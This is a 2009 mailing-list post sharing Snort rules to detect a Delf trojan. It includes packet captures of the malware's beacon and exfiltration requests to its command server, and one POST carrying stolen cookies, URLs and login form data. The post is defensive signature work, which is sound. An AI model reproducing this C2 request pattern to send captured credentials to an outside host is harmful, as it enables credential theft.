[Emerging-Sigs] Trojan: Delf Web Activity

ANDREW J WOOD AJWOOD at sentara.com
Fri Jan 30 16:42:03 EST 2009


We've discovered a Trojan that scans cookies, http posts, URLs.  When it finds something of interest, posts it to a website, in my case, located in Japan.  I have created 2 basic rules that capture the traffic.  I would have been more specific, but as I only have one example, I did not want to miss a small variation.  I've included a complete POST that gets sent, as grabbed by tcpdump. (Don't get me started with the Viewstate)

AVG calls the Trojans this host has "delf.hgn" and "delf.hgm".  So far, I've seen no AV or malware detection app that sees the infected files while they are loaded in mem.  On our system,  they dropped 2 files: svchost.exe and csrss.exe (Did not overwrite the system files with the same name).

alert tcp $HOME_NET any -> !$HOME_NET 80 (msg:"TROJAN ACTIVITY:  DELF Web Posts"; flow: to_server,established; uricontent: "/uploads/update"; nocase; uricontent: "uploadposts"; nocase; classtype:trojan-activity; sid:9000001; rev:1;)

alert tcp $HOME_NET any -> !$HOME_NET 80 (msg:"TROJAN ACTIVITY:  DELF Web Activity"; flow: to_server,established; uricontent: "/uploads/update"; nocase; uricontent: "read_cmd"; nocase; classtype:trojan-activity; sid:9000002; rev:1;)

Note:  The 3 GET requests below are independent of whether there is data to post.

Thanks,
Andy

Header of seen GET/POST requests:

GET /uploads/update/b.php?p=p HTTP/1.1 
Host: shindan-f.com Accept: text/html, */* 
Accept-Encoding: identity 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en;) Gecko/30060309 Firefox/1.5.0.7

________________________________________________

GET /uploads/update/b.php/../p.php HTTP/1.1
 Host: shindan-f.com
 Accept: text/html, */*
 Accept-Encoding: identity
 User-Agent: Mozilla/3.0 (compatible; Indy Library)

_________________________________________________

GET /uploads/update/b.php?id=2697&cmd=read_cmd&idle=0 HTTP/1.1 
Host: shindan-f.com 
Accept: text/html, */* 
Accept-Encoding: identity 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en;) Gecko/30060309 Firefox/1.5.0.7

__________________________________________________

POST /uploads/update/b.php?cmd=uploadposts&v=3.0.0-1&id=2697 HTTP/1.0 
Connection: keep-alive 
Content-Type: multipart/form-data; boundary=--------013009142437078 
Content-Length: 935 
Host: shindan-f.com 
Accept: text/html, */* 
Accept-Encoding: identity 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en;) Gecko/30060309 Firefox/1.5.0.7

----------013009145438524 
Content-Disposition: form-data; name="cmd"  

uploadposts 
----------013009145438524 
Content-Disposition: form-data; name="data_url"   

----------013009145438524 Content-Disposition: form-data; name="data_cookies"  

----------013009145438524 Content-Disposition: form-data; name="data_posts"  

https://data.portal.com/unsecured/login.aspx?TYPE=33554432&REALMOID=06-645d1a09-7d5b-4bcc-ae23-d3ef2bb370a5&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=data2&TARGET=-SM-https%3a%2f%2fdata2.portal.com%2f 

BIGipServerSI_data.portal.com_pool=2869159587.0.0000

__VIEWSTATE=%2FwEPDwULLTE1ODYzMzc1NTNkZJW8ETSAKqS6547tGB%2BEzHmDnJIQ&ctlLogin%24LoginID=UZER123&ctlLogin%24Password=YerBusted&ctlLogin%24ctl00=Login&__EVENTVALIDATION=%2FwEWBAKzvYfqCAK%2Bg5SfDAKEhPnFBAKPs6rKCSx7jOoVbzXESearFJ%2FUakKddnuW.

===================================

[part=0 total=546] ----------013009145438524--




More information about the Emerging-sigs mailing list